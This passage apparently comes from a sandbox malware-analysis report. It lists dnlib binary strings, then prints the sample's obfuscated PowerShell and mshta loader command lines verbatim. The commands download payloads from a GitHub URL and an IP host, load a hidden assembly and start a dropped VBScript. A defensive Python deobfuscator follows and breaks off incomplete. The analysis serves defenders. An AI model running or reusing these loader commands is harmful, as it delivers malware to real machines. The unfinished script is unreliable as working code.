                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
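The powershell.exe command lines above are the sample's loader chain, and an analyst wants them unwrapped without running them. The Python below is an added example, not code from the Joe Sandbox report or from the sample, and it executes none of the attacker's PowerShell: it statically evaluates the '+'-joined fragments and [char]N casts, applies the .REPlAce('tg4', '$') and .REPlAce('NlL', "'") rewrites, reverses the backwards C2 argument (txt.ECCFRR/054/04.022.3.291//:ptth becomes http://192.3.220.40/450/RRFCCE.txt), resolves the cmdlet hidden in (gV '*MdR*').Name[3,11,2] (MaximumDriveCount yields iex), and unwraps the nested IEx/FromBase64String wrapper of the mshta-spawned stage. LAYER1 is copied from the report; LAYER2 reuses the report's [char] wrapper around a constructed payload rather than the report's long base64 blob (that blob decodes to an Add-Type P/Invoke of urlmon URLDownloadToFile that saves http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF as %APPDATA%\seethebestpricewithgoodcookiesm.vbS, sleeps three seconds and starts it, which accounts for the csc.exe compile and the wscript.exe parent seen in this section). The PREFERENCE_VARIABLES table is an assumption: the default Maximum* variables of Windows PowerShell 5.1.

```python
"""Static deobfuscation of the PowerShell layers in this report (added example)."""
import base64
import re

# Layer 1: the inner -command argument of the powershell.exe process-creation
# line in this section, copied verbatim from the report.
LAYER1 = r"""('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"""

# Layer 2: the report's exact IEx($(IeX('...'+[cHaR]58+...))) wrapper, with the
# report's long base64 blob swapped for a constructed payload (offline, short).
LAYER2_PAYLOAD = "Write-Output 'constructed stage-2 payload'"
LAYER2 = (
    "IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58"
    "+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a"
    "+'FromBaSE64sTrIng('+[chAR]34+'"
    + base64.b64encode(LAYER2_PAYLOAD.encode()).decode()
    + "'+[ChAr]0X22+'))')))"
)

# Assumption: the default Maximum* preference variables of Windows PowerShell
# 5.1, which is what (gV '*MdR*') enumerates on the victim.
PREFERENCE_VARIABLES = [
    "MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
    "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount",
]

# A 'literal' ('' escapes a quote) or a [char]N / [string][char]N cast.
_TOKEN = re.compile(
    r"'((?:[^']|'')*)'|\[(?:string\]\s*\[)?char\]\s*(0x[0-9a-f]+|\d+)", re.I)
_REPLACE = re.compile(
    r"\.replace\(\s*(.+?)\s*,\s*(.+?)\s*\)(?=\s*(?:\.replace\(|\||$))", re.I)
_GV_INDEX = re.compile(
    r"\(\s*gv\s+'([^']+)'\s*\)\s*\.name\[([\d,\s]+)\]\s*-join\s*''", re.I)


def ps_concat(expr):
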